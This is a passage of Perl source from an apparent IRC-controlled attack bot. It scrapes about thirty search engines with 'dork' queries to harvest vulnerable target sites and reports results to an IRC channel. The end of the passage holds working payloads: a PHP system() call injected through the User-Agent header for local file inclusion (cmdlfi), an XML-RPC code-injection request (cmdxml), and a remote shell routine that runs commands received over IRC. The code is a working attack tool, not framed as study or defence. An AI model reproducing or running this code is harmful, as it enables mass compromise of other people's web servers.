1296. if ($engine eq "GooGle2") { my @google2 = &google2($dork); push(@total,@google2); }
1297. if ($engine eq "ExaLead") { my @exalead = &exalead($dork); push(@total,@exalead); }
1298. if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); }
1299. if ($engine eq "VirgiLio") { my @virgilio = &virgilio($dork); push(@total,@virgilio); }
1300. if ($engine eq "WebDe") { my @webde = &webde($dork); push(@total,@webde); }
1301. if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }
1302. if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); }
1303. if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); }
1304. if ($engine eq "DuCk") { my @duck = &duck($dork); push(@total,@duck); }
1305. if ($engine eq "LyGo") { my @lygo = &lygo($dork); push(@total,@lygo); }
1306. if ($engine eq "YauSe") { my @yause = &yause($dork); push(@total,@yause); }
1307. if ($engine eq "BaiDu") { my @baidu = &baidu($dork); push(@total,@baidu); }
1308. if ($engine eq "KiPoT") { my @kipot = &kipot($dork); push(@total,@kipot); }
1309. if ($engine eq "GiBLa") { my @gibla = &gibla($dork); push(@total,@gibla); }
1310. if ($engine eq "BLacK") { my @black = &black($dork); push(@total,@black); }
1311. if ($engine eq "oNeT") { my @onet = &onet($dork); push(@total,@onet); }
1312. if ($engine eq "SiZuka") { my @sizuka = &sizuka($dork); push(@total,@sizuka); }
1313. if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); }
1314. if ($engine eq "DeMos") { my @demos = &demos($dork); push(@total,@demos); }
1315. if ($engine eq "RoSe") { my @rose = &rose($dork); push(@total,@rose); }
1316. if ($engine eq "SeZnaM") { my @seznam = &seznam($dork); push(@total,@seznam); }
1317. if ($engine eq "TisCali") { my @tiscali = &tiscali($dork); push(@total,@tiscali); }
1318. if ($engine eq "NaVeR") { my @naver = &naver($dork); push(@total,@naver); }
1319. @clean = &clean(@total);
1320. &msg("$chan","$logo(4@8$engine15)4 Total:0 (".scalar(@total).")4 Clean:0 (".scalar(@clean).")");
1321. return @clean;
1322. }
1323.  
1324. #########################################
1325.  
1326. sub isFound() {
1327. my $status = 0;
1328. my $link = $_[0];
1329. my $reqexp = $_[1];
1330. my $res = &get_content($link);
1331. if ($res =~ /$reqexp/) { $status = 1 }
1332. return $status;
1333. }
1334.  
1335. sub get_content() {
1336. my $url = $_[0];
1337. my $ua = LWP::UserAgent->new(agent => $uagent);
1338. $ua->timeout(7);
1339. my $req = HTTP::Request->new(GET => $url);
1340. my $res = $ua->request($req);
1341. return $res->content;
1342. }
1343.  
1344. ######################################### SEARCH ENGINE gibla
1345.  
1346. sub google() {
1347. my @list;
1348. my $key = $_[0];
1349. for (my $i=0; $i<=400; $i+=10){
1350. my $search = ("http://www.google.com/search?q=".&key($key)."&num=100&filter=0&start=".$i);
1351. my $res = &search_engine_query($search);
1352. while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
1353. if ($1 !~ /google/){
1354. my $link = $1;
1355. my @grep = &links($link);
1356. push(@list,@grep);
1357. }
1358. }
1359. }
1360. return @list;
1361. }
1362.  
1363. sub rediff() {
1364. my @list;
1365. my $key = $_[0];
1366. for (my $i=0; $i<=500; $i+=10) {
1367. my $search = ("http://search1.rediff.com/dirsrch/default.asp?MT=".&key($key)."&iss=&submit=Search&firstres=".$i);
1368. $b = "$i";
1369. my $res = &search_engine_query($search);
1370. if ($res !~ /firstres=$b\'>/) {$i=500;}
1371. while ($res =~ m/<a href=\"http:\/\/(.*?)\" onmousedown/g) {
1372. if ($1 !~ /rediff\.com/){
1373. my $link = $1;
1374. my @grep = &links($link);
1375. push(@list,@grep);
1376. }
1377. }
1378. }
1379. return @list;
1380. }
1381.  
1382. sub uol() {
1383. my @list;
1384. my $key = $_[0];
1385. for (my $i=1; $i<=500; $i+=10) {
1386. my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".&key($key)."&start=".$i);
1387. my $res = &search_engine_query($search);
1388. if ($res !~ m/<span class=\"next\">pr&#243;xima<\/span>/){$i=500;}
1389. while ($res =~ m/<a href=\"http:\/\/([^>\"]*)/g) {
1390. if ($1 !~ /uol\.com/) {
1391. my $link = $1;
1392. my @grep = &links($link);
1393. push(@list,@grep);
1394. }
1395. }
1396. }
1397. return @list;
1398. }
1399.  
1400. sub bing() {
1401. my @list;
1402. my $key = $_[0];
1403. for (my $i=1; $i<=500; $i+=10) {
1404. my $search = ("http://www.bing.com/search?q=".&key($key)."&filt=all&first=".$i."&FORM=PERE");
1405. my $res = &search_engine_query($search);
1406. if ($res =~ m/Ref A:/g && $res =~ m/Ref B:/g && $res =~ m/Ref C:/g) {$i=500;}
1407. while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
1408. if ($1 !~ /bing\.com/) {
1409. my $link = $1;
1410. my @grep = &links($link);
1411. push(@list,@grep);
1412. }
1413. }
1414. }
1415. return @list;
1416. }
1417.  
1418. sub altavista() {
1419. my @list;
1420. my $key = $_[0];
1421. for (my $i=1; $i<=500; $i+=10){
1422. my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".&key($key)."&stq=".$i);
1423. my $res = &search_engine_query($search);
1424. if ($res !~ /target=\"_self\">Succ/) {$i=500;}
1425. while ($res =~ m/<span class=ngrn>(.+?)\//g) {
1426. if ($1 !~ /altavista/){
1427. my $link = $1;
1428. $link =~ s/<//g;
1429. $link =~ s/ //g;
1430. my @grep = &links($link);
1431. push(@list,@grep);
1432. }
1433. }
1434. }
1435. return @list;
1436. }
1437.  
1438. sub ask() {
1439. my @list;
1440. my $key = $_[0];
1441. for (my $i=1; $i<=50; $i+=1) {
1442. my $search = ("http://it.ask.com/web?q=".&key($key)."&qsrc=0&o=0&l=dir&qid=EE90DE6E8F5370F363A63EC61228D4FE&page=".$i."&jss=1&dm=all");
1443. my $res = &search_engine_query($search);
1444. if ($res !~ /Successiva/) {$i=50;}
1445. while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=\"/g) {
1446. if ($1 !~ /ask\.com/){
1447. my $link = $1;
1448. my @grep = &links($link);
1449. push(@list,@grep);
1450. }
1451. }
1452. }
1453. return @list;
1454. }
1455.  
1456. sub yahoo(){
1457. my @list;
1458. my $key = $_[0];
1459. my $b = 0;
1460. for ($b=1; $b<=500; $b+=10) {
1461. my $search = ("http://search.yahoo.com/search?p=".&key($key)."&b=".$b);
1462. my $res = &search_engine_query($search);
1463. while ($res =~ m/http\%3a\/\/(.+?)\"/g) {
1464. if ($1 !~ /yahoo\.com/){
1465. my $link = $1;
1466. my @grep = &links($link);
1467. push(@list,@grep);
1468. }
1469. }
1470. }
1471. return @list;
1472. }
1473.  
1474. sub clusty() {
1475. my @list;
1476. my $key = $_[0];
1477. my $b = 0;
1478. for ($b=10; $b<=500; $b+=10) {
1479. my $search = ("http://search.yippy.com/search?query=".&key($key)."&input-form=clusty-simple&v:sources=webplus&v:state=root|root-".$b."-10|0&");
1480. my $res = &search_engine_query($search);
1481. if ($res !~ /next/) {$b=500;}
1482. while ($res =~ m/<div class=\"document-header\"><a href=\"http:\/\/(.*?)\"><span class=\"title\">/g) {
1483. if ($1 !~ /yippy\.com/){
1484. my $link = $1;
1485. my @grep = &links($link);
1486. push(@list,@grep);
1487. }
1488. }
1489. }
1490. return @list;
1491. }
1492.  
1493. sub gutser() {
1494. my @list;
1495. my $key = $_[0];
1496. for ($b=1; $b<=50; $b+=1) {
1497. my $search = ("http://www.goodsearch.com/Search.aspx?Keywords=".&key($key)."&page=".$b."&osmax=0");
1498. my $res = &search_engine_query($search);
1499. while ($res =~ m/http:\/\/([^>\"]*)\">/g) {
1500. if ($1 !~ /goodsearch|good\.is|w3\.org|quantserve/){
1501. my $link = $1;
1502. my @grep = &links($link);
1503. push(@list,@grep);
1504. }
1505. }
1506. }
1507. return @list;
1508. }
1509.  
1510. sub google2() {
1511. my @list;
1512. my $key = $_[0];
1513. my $b = 0;
1514. my @doms = ("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");
1515. foreach my $domain (@doms) { $dom = $doms[rand(scalar(@doms))];
1516. for ($b=1; $b<=200; $b+=10) {
1517. my $search = ("http://www.google.".$dom."/search?num=50&q=".&key($key)."&start=".$b."&sa=N");
1518. my $res = &search_engine_query($search);
1519. while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
1520. if ($1 !~ /google/){
1521. my $link = $1;
1522. my @grep = &links($link);
1523. push(@list,@grep);
1524. }
1525. }
1526. } return @list;
1527. }
1528. }
1529.  
1530. sub exalead() {
1531. my @list;
1532. my $key = $_[0];
1533. for ($b=0; $b<=1000; $b+=100) {
1534. my $search = ("http://www.exalead.com/search/web/results/?q=".&key($key)."&elements_per_page=100&start_index=".$b);
1535. my $res = &search_engine_query($search);
1536. if ($res =~ m/<span id=\"topNextUrl\">/g) {$b=1000;}
1537. while ($res =~ m/<a class=\"thumbnail\" href=\"http:\/\/(.*?)\"/g) {
1538. my $link = $1;
1539. if ($link!~ /exalead/){
1540. my @grep = &links($link);
1541. push(@list,@grep);
1542. }
1543. }
1544. }
1545. return @list;
1546. }
1547.  
1548. sub lycos() {
1549. my @list;
1550. my $key = $_[0];
1551. for ($b=0; $b<=50; $b+=1) {
1552. my $search = ("http://search.lycos.com/?query=".&key($key)."&page2=".$b."&tab=web&searchArea=web&diktfc=468007302EF7DB9AFE53D4138B848E7B4000D424385F");
1553. my $res = &search_engine_query($search);
1554. while ($res =~ m/href=\"http:\/\/(.+?)\" onmouseover=/g) {
1555. if ($1 !~ /lycos\.com/){
1556. my $link = $1;
1557. my @grep = &links($link);
1558. push(@list,@grep);
1559. }
1560. }
1561. }
1562. return @list;
1563. }
1564.  
1565. sub virgilio() {
1566. my @list;
1567. my $key = $_[0];
1568. for ($b=10; $b<=500; $b+=10) {
1569. my $search = ("http://ricerca.virgilio.it/ricerca?qs=".&key($key)."&filter=1&site=&lr=&hits=10&offset=".$b);
1570. my $res = &search_engine_query($search);
1571. if ($res =~ m/non ha prodotto risultati/i) {$b=500;}
1572. if ($res =~ m/riconducibile a richieste effettuate/i) {$b=500;}
1573. while ($res =~ m/<a href=\"http:\/\/(.+?)\" target=\"/g) {
1574. if ($1 !~ /\.virgilio\.it/){
1575. my $link = $1;
1576. my @grep = &links($link);
1577. push(@list,@grep);
1578. }
1579. }
1580. }
1581. return @list;
1582. }
1583.  
1584. sub webde() {
1585. my @list;
1586. my $key = $_[0];
1587. for ($b=1; $b<=50; $b+=1) {
1588. my $search = ("http://suche.web.de/search/web/?pageIndex=".$b."&su=".&key($key)."&search=Suche&webRb=countryDE");
1589. my $res = &search_engine_query($search);
1590. if ($res =~ m/Suchbegriff nicht gefunden/i) {$b=50;}
1591. while ($res =~ m/<span class=\"url\">http:\/\/(.*?)<\/span>/g) {
1592. my $link = $1;
1593. if ($link!~ /suche|web/){
1594. my @grep = &links($link);
1595. push(@list,@grep);
1596. }
1597. }
1598. }
1599. return @list;
1600. }
1601.  
1602. sub hotbot() {
1603. my @list;
1604. my $key = $_[0];
1605. for ($b=0; $b<=50; $b+=1) {
1606. my $search = ("http://www.hotbot.com/?query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=msn&page=".$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
1607. my $res = &search_engine_query($search);
1608. if ($res =~ m/had no web result/i) {$b=50;}
1609. while ($res =~ m/rel=\"nofollow\" href=\"http:\/\/(.+?)\"/g) {
1610. if ($1 !~ /hotbot\.com/){
1611. my $link = $1;
1612. my @grep = &links($link);
1613. push(@list,@grep);
1614. }
1615. }
1616. }
1617. return @list;
1618. }
1619.  
1620. sub aol() {
1621. my @list;
1622. my $key = $_[0];
1623. for ($b=2; $b<=50; $b+=1) {
1624. my $search = ("http://aim.search.aol.com/aol/search?q=".&key($key)."&page=".$b);
1625. my $res = &search_engine_query($search);
1626. while ($res =~ m/href=\"http:\/\/(.*?)\" property/g) {
1627. if ($1 !~ /aol\.com/){
1628. my $link = $1;
1629. my @grep = &links($link);
1630. push(@list,@grep);
1631. }
1632. }
1633. }
1634. return @list;
1635. }
1636.  
1637. sub sapo(){
1638. my @list;
1639. my $key = $_[0];
1640. for ($b=1; $b<=50; $b+=1) {
1641. my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$b."&q=".&key($key)."&st=local");
1642. my $res = &search_engine_query($search);
1643. if ($res !~ m/Next/i) {$b=50;}
1644. while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
1645. if ($1 !~ /\.sapo\.pt/){
1646. my $link = $1;
1647. my @grep = &links($link);
1648. push(@list,@grep);
1649. }
1650. }
1651. }
1652. return @list;
1653. }
1654.  
1655. sub duck() {
1656. my @list;
1657. my $key = $_[0];
1658. my $b = 0;
1659. for ($b=1; $b<=50; $b+=1) {
1660. my $search = ("http://duckduckgo.com/html/?q=".&key($key)."&t=A&l=en&p=1&s=".$b."&o=json&dc=".$b."&api=d.js");
1661. my $res = &search_engine_query($search);
1662. if ($res =~ m/No more results/i) {$b=50;}
1663. while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
1664. if ($1 !~ /duckduckgo/){
1665. my $link = $1;
1666. my @grep = &links($link);
1667. push(@list,@grep);
1668. }
1669. }
1670. }
1671. return @list;
1672. }
1673.  
1674. sub lygo() {
1675. my @list;
1676. my $key = $_[0];
1677. my $b = 0;
1678. for ($b=0; $b<=50; $b+=1) {
1679. my $search = ("http://www.hotbot.com/?query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=lygo&page2=".$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
1680. my $res = &search_engine_query($search);
1681. if ($res =~ m/had no web result/i) {$b=50;}
1682. while ($res =~ m/<a href=\"http:\/\/(.+?)\"><img/g) {
1683. if ($1 !~ /hotbot\.com/){
1684. my $link = $1;
1685. my @grep = &links($link);
1686. push(@list,@grep);
1687. }
1688. }
1689. }
1690. return @list;
1691. }
1692.  
1693. sub yause() {
1694. my @list;
1695. my $key = $_[0];
1696. my $b = 0;
1697. for ($b=1; $b<=50; $b+=1) {
1698. my $search = ("http://www.yauba.com/?query=".&key($key)."&where=websites&target=websites&con=y&ilang=english&clt=topic&pg=".$b);
1699. my $res = &search_engine_query($search);
1700. if ($res !~ m/Next/i) {$b=50;}
1701. while ($res =~ m/<h1><a rel=\"nofollow\" href=\"http:\/\/(.+?)\" onfocus=/g) {
1702. if ($1 !~ /yauba\.com/){
1703. my $link = $1;
1704. my @grep = &links($link);
1705. push(@list,@grep);
1706. }
1707. }
1708. }
1709. return @list;
1710. }
1711.  
1712. sub baidu() {
1713. my @list;
1714. my $key = $_[0];
1715. my $b = 0;
1716. for ($b=0; $b<=500; $b+=10) {
1717. my $search = ("http://www.baidu.com/s?wd=".&key($key)."&pn=".$b);
1718. my $res = &search_engine_query($search);
1719. while ($res =~ m/\" href=\"http:\/\/(.*?)\" target=/g) {
1720. if ($1 !~ /baidu\.com/){
1721. my $link = $1;
1722. my @grep = &links($link);
1723. push(@list,@grep);
1724. }
1725. }
1726. }
1727. return @list;
1728. }
1729.  
1730. sub kipot() {
1731. my @list;
1732. my $key = $_[0];
1733. my $b = 0;
1734. for ($b=1; $b<=50; $b+=1) {
1735. my $search = ("http://www.qkport.com/".$b."/web/".&key($key));
1736. my $res = &search_engine_query($search);
1737. while ($res =~ m/href=\"http:\/\/(.*?)\" target=\"_top\"/g) {
1738. if ($1 !~ /qkport\.com/){
1739. my $link = $1;
1740. my @grep = &links($link);
1741. push(@list,@grep);
1742. }
1743. }
1744. }
1745. return @list;
1746. }
1747.  
1748. sub gibla() { #mati#
1749. my @list;
1750. my $key = $_[0];
1751. my $hal = "/search?q=".&key($key);
1752. my $search = ("http://www.gigablast.com".$hal);
1753. my $res = &search_engine_query($search);
1754. while ($res =~ m/Next 10 Results/) {
1755. $search = ("http://www.gigablast.com".$hal);
1756. while ($res =~ m/<span class=\"url\">(.+?)><\/span>/g) {
1757. my $link = $1;
1758. my @grep = &links($link);
1759. push(@list,@grep);
1760. }
1761. if ($res =~ m/<center><a href=\"(.*?)\">/) { $hal = $1; }
1762. $res = &search_engine_query($search);
1763. }return @list;
1764. }
1765.  
1766. sub black() {
1767. my @list;
1768. my $key = $_[0];
1769. my $b = 0;
1770. for ($b=0; $b<=50; $b+=1) {
1771. my $search = ("http://blekko.com/ws/".&key($key)."?ft=&p=".$b);
1772. my $cek = $b+1;
1773. my $res = &search_engine_query($search);
1774. if ($res !~ m/<strong>$b<\/strong>/i) {$b=50;}
1775. while ($res =~ m/class=\"UrlTitleLine\" href=\"http:\/\/(.+?)\"/g) {
1776. if ($1 !~ /blekko/){
1777. my $link = $1;
1778. my @grep = &links($link);
1779. push(@list,@grep);
1780. }
1781. }
1782. }
1783. return @list;
1784. }
1785.  
1786. sub onet() {
1787. my @list;
1788. my $key = $_[0];
1789. my $b = 0;
1790. for ($b=1; $b<=50; $b+=1) {
1791. my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".&key($key));
1792. my $res = &search_engine_query($search);
1793. while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
1794. if ($1 !~ /webcache|query/){
1795. my $link = $1;
1796. my @grep = &links($link);
1797. push(@list,@grep);
1798. }
1799. }
1800. }
1801. return @list;
1802. }
1803.  
1804. sub sizuka() {
1805. my @list;
1806. my $key = $_[0];
1807. my $b = 0;
1808. for ($b=10; $b<=100; $b+=10) {
1809. my $search = ("http://www.szukacz.pl/szukaj.aspx?ct=polska&pc=polska&q=".&key($key)."&start=".$b);
1810. my $res = &search_engine_query($search);
1811. while ($res =~ m/<a title=\"http:\/\/(.+?)\"/g) {
1812. if ($1 !~ /szukacz/){
1813. my $link = $1;
1814. my @grep = &links($link);
1815. push(@list,@grep);
1816. }
1817. }
1818. }
1819. return @list;
1820. }
1821.  
1822. sub walla() {
1823. my @list;
1824. my $key = $_[0];
1825. my $b = 0;
1826. for ($b=0; $b<=50; $b+=1) {
1827. my $search = ("http://search.walla.co.il/?t=0&e=utf&q=".&key($key)."&p=".$b);
1828. my $res = &search_engine_query($search);
1829. while ($res =~ m/<td class=sw><a href=\"http:\/\/(.+?)\"/g) {
1830. if ($1 !~ /walla\.co\.il/){
1831. my $link = $1;
1832. my @grep = &links($link);
1833. push(@list,@grep);
1834. }
1835. }
1836. }
1837. return @list;
1838. }
1839.  
1840. sub demos() {
1841. my @list;
1842. my $key = $_[0];
1843. my $b = 0;
1844. for ($b=0; $b<=500; $b+=10) {
1845. my $search = ("http://search.dmoz.org/search/search?q=".&key($key)."&start=".$b."&type=next&all=yes");
1846. my $res = &search_engine_query($search);
1847. while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
1848. if ($1 !~ /search|dmoz/){
1849. my $link = $1;
1850. my @grep = &links($link);
1851. push(@list,@grep);
1852. }
1853. }
1854. }
1855. return @list;
1856. }
1857.  
1858. sub rose() {
1859. my @list;
1860. my $key = $_[0];
1861. my $b = 0;
1862. my @langs = ("de","nl","fi","ps","da","en","es","fr","it","no","sv","cs","pl","ru");
1863. foreach my $language (@langs) { $lang = $langs[rand(scalar(@langs))];
1864. for ($b=0; $b<=30; $b+=10) {
1865. my $search = ("http://euroseek.com/system/search.cgi?language=".$lang."&mode=internet&start=".$b."&string=".&key($key));
1866. my $res = &search_engine_query($search);
1867. while ($res =~ m/<a href=\"http:\/\/(.+?)\" class=/g) {
1868. if ($1 !~ /euroseek/){
1869. my $link = $1;
1870. my @grep = &links($link);
1871. push(@list,@grep);
1872. }
1873. }
1874. }
1875. }return @list;
1876. }
1877.  
1878. sub seznam() {
1879. my @list;
1880. my $key = $_[0];
1881. for ($b=1; $b<=500; $b+=10) {
1882. my $search = ("http://search.seznam.cz/?q=".&key($key)."&count=10&pId=SkYLl2GXwV0CZZUQcglt&from=".$b);
1883. my $res = &search_engine_query($search);
1884. while ($res =~ m/<a href=\"http:\/\/(.+?)\" title/g) {
1885. if ($1 !~ /seznam/){
1886. my $link = $1;
1887. my @grep = &links($link);
1888. push(@list,@grep);
1889. }
1890. }
1891. }
1892. return @list;
1893. }
1894.  
1895. sub tiscali() {
1896. my @list;
1897. my $key = $_[0];
1898. for ($b=0; $b<=500; $b+=10) {
1899. my $search = ("http://search.tiscali.it/?tiscalitype=web&collection=web&start=".$b."&q=".&key($key));
1900. my $res = &search_engine_query($search);
1901. while ($res =~ m/<a href=\"http:\/\/(.+?)\" onclick/g) {
1902. if ($1 !~ /tiscali/){
1903. my $link = $1;
1904. my @grep = &links($link);
1905. push(@list,@grep);
1906. }
1907. }
1908. }
1909. return @list;
1910. }
1911.  
1912. sub naver() {
1913. my @list;
1914. my $key = $_[0];
1915. for ($b=1; $b<=500; $b+=10) {
1916. my $search = ("http://web.search.naver.com/search.naver?where=webkr&query=".&key($key)."&docid=0&#9001;=all&f=&srcharea=all&st=s&fd=2&start=".$b."&display=10");
1917. my $res = &search_engine_query($search);
1918. while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
1919. if ($1 !~ /naver/){
1920. my $link = $1;
1921. my @grep = &links($link);
1922. push(@list,@grep);
1923. }
1924. }
1925. }
1926. return @list;
1927. }
1928.  
1929.  
1930. #########################################
1931.  
1932. sub clean() {
1933. my @cln = ();
1934. my %visit = ();
1935. foreach my $element (@_) {
1936. $element =~ s/\/+/\//g;
1937. next if $visit{$element}++;
1938. push @cln, $element;
1939. }
1940. return @cln;
1941. }
1942.  
1943. sub key() {
1944. my $dork = $_[0];
1945. $dork =~ s/ /\+/g;
1946. $dork =~ s/:/\%3A/g;
1947. $dork =~ s/\//\%2F/g;
1948. $dork =~ s/\?/\%3F/g;
1949. $dork =~ s/&/\%26/g;
1950. $dork =~ s/\"/\%22/g;
1951. $dork =~ s/,/\%2C/g;
1952. $dork =~ s/\\/\%5C/g;
1953. $dork =~ s/@/\%40/g;
1954. $dork =~ s/\[/\%5B/g;
1955. $dork =~ s/\]/\%5D/g;
1956. $dork =~ s/\?/\%3F/g;
1957. $dork =~ s/\=/\%3D/g;
1958. $dork =~ s/\|/\%7C/g;
1959. return $dork;
1960. }
1961.  
1962. sub links() {
1963. my @list;
1964. my $link = $_[0];
1965. my $host = $_[0];
1966. my $hdir = $_[0];
1967. $hdir =~ s/(.*)\/[^\/]*$/$1/;
1968. $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
1969. $host .= "/";
1970. $link .= "/";
1971. $hdir .= "/";
1972. $host =~ s/\/\//\//g;
1973. $hdir =~ s/\/\//\//g;
1974. $link =~ s/\/\//\//g;
1975. push(@list,$link,$host,$hdir);
1976. return @list;
1977. }
1978.  
1979. sub search_engine_query($) {
1980. my $url = $_[0];
1981. $url =~ s/http:\/\///;
1982. my $host = $url;
1983. my $query = $url;
1984. my $page = "";
1985. $host =~ s/href=\"?http:\/\///;
1986. $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
1987. $query =~ s/$host//;
1988. if ($query eq "") { $query = "/"; }
1989. eval {
1990. my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
1991. print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";
1992. my @pages = <$sock>;
1993. $page = "@pages";
1994. close($sock);
1995. };
1996. return $page;
1997. }
1998.  
1999. #########################################
2000.  
2001. sub shell() {
2002. my $path = $_[0];
2003. my $cmd = $_[1];
2004. if ($cmd =~ /cd (.*)/) {
2005. chdir("$1") || &msg("$path","4,1No such file or directory");
2006. return;
2007. }
2008. elsif ($pid = fork) { waitpid($pid, 0); }
2009. else { if (fork) { exit; } else {
2010. my @output = `$cmd 2>&1 3>&1`;
2011. my $c = 0;
2012. foreach my $output (@output) {
2013. $c++;
2014. chop $output;
2015. &msg("$path","$output");
2016. if ($c == 5) { $c = 0; sleep 2; }
2017. }
2018. exit;
2019. }}
2020. }
2021.  
2022. sub isAdmin() {
2023. my $status = 0;
2024. my $nick = $_[0];
2025. if ($nick eq $admin) { $status = 1; }
2026. return $status;
2027. }
2028.  
2029. sub msg() {
2030. return unless $#_ == 1;
2031. sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
2032. }
2033.  
2034. sub nick() {
2035. return unless $#_ == 0;
2036. sendraw("NICK $_[0]");
2037. }
2038.  
2039. sub notice() {
2040. return unless $#_ == 1;
2041. sendraw("NOTICE $_[0] :$_[1]");
2042. }
2043.  
2044. sub cmdlfi() {
2045. my $browser = LWP::UserAgent->new;
2046. my $url = $_[0];
2047. my $cmd = $_[1];
2048. my $chan = $_[2];
2049. my $hie = "j13mbut<?system(\"$cmd 2> /dev/stdout\"); ?>j13mbut";
2050. $browser->agent("$hie");
2051. $browser->timeout(7);
2052. $response = $browser->get( $url );
2053. if ($response->content =~ /j13mbut(.*)j13mbut/s) {
2054. &msg("$chan","15,1(4@9CMDLFI15)9 $1");
2055. } else {
2056. &msg("$chan","15,1(4@9CMDLFI15)4 No Output");
2057. }
2058. }
2059.  
2060. sub cmdxml() {
2061. my $jed = $_[0];
2062. my $dwa = $_[1];
2063. my $chan = $_[2];
2064. my $userAgent = LWP::UserAgent->new(agent => 'perl post');
2065. $exploit = "<?xml version=\"1.0\"?><methodCall>";
2066. $exploit .= "<methodName>test.method</methodName>";
2067. $exploit .= "<params><param><value><name>',''));";
2068. $exploit .= "echo'bamby';system('".$dwa."');echo'solo';exit;/*</name></value></param></params></methodCall>";
2069. my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);
2070. if ($response->content =~ /bamby(.*)solo/s) {
2071. &msg("$chan","15,1(4@9CMDXML15)9 $1");
2072. } else {
2073. &msg("$chan","15,1(4@9CMDXML15)4 No Output");
2074. }
2075. }